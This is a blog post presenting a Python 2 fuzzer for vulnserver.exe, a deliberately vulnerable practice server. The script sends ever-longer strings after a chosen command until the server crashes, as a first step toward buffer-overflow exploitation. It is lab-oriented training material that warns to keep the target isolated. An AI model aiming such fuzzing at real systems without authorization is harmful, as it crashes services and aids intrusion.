Sunday, January 11, 2015

Built Fuzzer for vulnserver.exe using Python

While searching for information about buffer overflows and how to exploit them, I found "vulnserver.exe", a deliberately vulnerable Windows TCP server that "The Grey Corner" wrote for practicing exploit development: http://www.thegreycorner.com/2010/12/introducing-vulnserver.html. Because it is intentionally exploitable, run it only inside an isolated lab VM and never expose it to a network you do not control.

I then started fuzzing vulnserver.exe and wrote the Python 2 fuzzer below (it uses print statements and raw_input). It connects to the target, lets you pick one of the server's commands, and sends that command followed by a string that grows each round, so you can see at what length the server stops responding. It can be adapted to fuzz other line-oriented TCP services by editing the target address and the command handling in the source listed below.

#!/usr/bin/python

import socket

def optionsMenu(currentCommand, currentChar, currentSize, currentMulti):
    """Print the interactive menu and return the operator's choice as a raw string.

    The current fuzzing parameters are echoed next to the option that changes
    them, so the operator can see what will be sent before choosing 'Run'.
    Returns whatever raw_input() read, unvalidated; main() dispatches on it.
    """
    payloadDesc = '"' + currentChar + '"*' + str(currentSize)
    menuLines = [
        'Select from the Following Options: ',
        '1. List Commands',
        '2. Set Command - "' + currentCommand + '"',
        '3. Set Character or String ("' + currentChar + '")',
        '4. Set String Initial Size (' + payloadDesc + ')',
        '5. Set String Multiplier ((' + payloadDesc + ')*' + str(currentMulti) + ')',
        '6. Run Fuzzer',
        '9. Exit',
    ]
    for line in menuLines:
        print(line)
    return raw_input('>> ')

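def listCommands(conn):
    """Ask the target for its command list ('HELP') and print the reply.

    conn: a connected TCP socket to the target.
    Returns the raw reply so callers can inspect it; it is printed as before.

    sendall() replaces send() because send() may write only part of the
    buffer.  An empty reply means the peer closed the connection (for example
    because it crashed during an earlier fuzz round); that is reported
    explicitly instead of printing a blank line.
    """
    print('')
    conn.sendall('HELP' + '\r\n')
    reply = conn.recv(1024)
    if not reply:
        print('[!] No reply: the target closed the connection.')
    else:
        print(reply)
    return reply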

def setString(currentChar):
    """Prompt for the character or string that is repeated to build the payload.

    currentChar: the value in effect now, shown to the operator.
    Returns the new entry verbatim; there is no validation, so an empty entry
    yields an empty payload.
    """
    print('')
    print('Current Character or String: ' + currentChar)
    return raw_input('Set Character> ')

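def setSize(currentSize):
    """Prompt for the initial payload length and return it as an int.

    currentSize: the value in effect now (int, or the str an earlier prompt
    returned).  It is kept, and a message printed, when the entry is not a
    non-negative whole number, so a typo can no longer surface later as a
    ValueError inside runFuzzer().
    """
    print('')
    print('Current Initial Size of String: ' + str(currentSize))
    entry = raw_input('Set Size> ')
    try:
        newSize = int(entry)
    except ValueError:
        print('Size must be a whole number; keeping ' + str(currentSize))
        return currentSize
    if newSize < 0:
        print('Size cannot be negative; keeping ' + str(currentSize))
        return currentSize
    return newSize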

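def setMultiplier(currentMulti):
    """Prompt for the number of fuzz rounds and return it as an int.

    currentMulti: the value in effect now (int, or the str an earlier prompt
    returned).  It is kept, and a message printed, when the entry is not a
    whole number of at least 1 (zero rounds would send nothing), so a typo
    cannot surface later as a ValueError inside runFuzzer().
    """
    print('')
    print('Current Multiplier of String: ' + str(currentMulti))
    entry = raw_input('Set Multiplier> ')
    try:
        newMulti = int(entry)
    except ValueError:
        print('Multiplier must be a whole number; keeping ' + str(currentMulti))
        return currentMulti
    if newMulti < 1:
        print('Multiplier must be at least 1; keeping ' + str(currentMulti))
        return currentMulti
    return newMulti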

def funcCommand(currentCommand):
    """Show the command currently being fuzzed and prompt for a replacement.

    Returns the operator's entry verbatim; nothing here checks it against the
    target's command list, which is why main() prints that list first.
    """
    print('')
    print('Current Command: ' + currentCommand)
    return raw_input('Set Command> ')

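def runFuzzer(conn, currentCommand, currentChar, currentSize, currentMulti):
    """Send currentCommand with a growing payload and watch for the target dying.

    Round i (1..currentMulti) sends ``currentCommand + ' ' + currentChar *
    (currentSize * i) + '\\r\\n'`` and prints the reply.  The run stops early
    when the peer closes the connection (empty recv) or the socket errors or
    times out, because with a crash-style overflow that is the result we are
    after: the payload length that caused it.

    conn: connected TCP socket (set a timeout on it so a hung target is
    reported instead of blocking recv() forever).
    currentSize, currentMulti: int or numeric str (the prompts return str).
    Returns the length of the payload (the repeated string only, not the
    command, space or CRLF) that got no reply, or None if every round was
    answered.  The printed 'Size of buffer' is the whole line including
    command, space and CRLF; subtract those when working out an offset.
    """
    print('')
    size = int(currentSize)
    rounds = int(currentMulti)
    for i in range(rounds):
        payload = currentChar * (size * (i + 1))
        line = currentCommand + ' ' + payload + '\r\n'
        try:
            # sendall(): send() may write only part of a large buffer.
            conn.sendall(line)
            print('Sent: ' + currentCommand + ' ("' + currentChar + '"*' + str(size) + ')*' + str(i + 1) + ' Size of buffer: ' + str(len(line)))
            reply = conn.recv(1024)
        except socket.error as exc:   # socket.timeout is a subclass
            print('[!] Socket error after a payload of ' + str(len(payload)) + ' bytes: ' + str(exc))
            return len(payload)
        if not reply:
            print('[!] Target closed the connection after a payload of ' + str(len(payload)) + ' bytes -- probable crash.')
            return len(payload)
        print(reply)
        print('')
    return None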

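def main():
    """Interactive loop: show the menu, apply the chosen action, repeat until '9'.

    Reads the module-level socket ``s`` opened by the script body (read-only,
    so no ``global`` declaration is needed).  The size and multiplier prompts
    may hand back int or str; runFuzzer() converts them, so the state is kept
    here exactly as received.  Any entry that is not a menu option falls
    through to the command listing, which doubles as help.
    """
    setCommand = 'STATS'
    setChar = 'A'
    initialSize = 50
    intMultiplier = 1
    menuOption = '0'
    while menuOption != '9':   # '!=' rather than the Python-2-only '<>'
        print('')
        menuOption = optionsMenu(setCommand, setChar, initialSize, intMultiplier)
        if menuOption == '1':
            listCommands(s)
        elif menuOption == '2':
            listCommands(s)   # show the valid commands before asking for one
            setCommand = funcCommand(setCommand)
        elif menuOption == '3':
            setChar = setString(setChar)
        elif menuOption == '4':
            initialSize = setSize(initialSize)
        elif menuOption == '5':
            intMultiplier = setMultiplier(intMultiplier)
        elif menuOption == '6':
            runFuzzer(s, setCommand, setChar, initialSize, intMultiplier)
        elif menuOption == '9':
            break
        else:
            listCommands(s)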


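# Target: set this to the address of the lab VM running vulnserver.exe.
# vulnserver is deliberately exploitable -- keep it on an isolated network.
server = '172.16.102.132'
sourcePort = 9999   # destination port on the target (name kept for compatibility)

if __name__ == '__main__':
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # A hung target would otherwise block recv() forever; with a timeout a
    # hang becomes a socket.timeout that runFuzzer() reports as a finding.
    s.settimeout(10)
    try:
        s.connect((server, sourcePort))
        # Read the banner the target sends on connect.  Comment this out if
        # you adapt the fuzzer to a service that expects the client to speak first.
        print(s.recv(1024))
        main()
    except socket.error as exc:
        print('[!] Connection to ' + server + ':' + str(sourcePort) + ' failed: ' + str(exc))
    finally:
        # Close on every exit path, including a traceback out of main().
        s.close()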

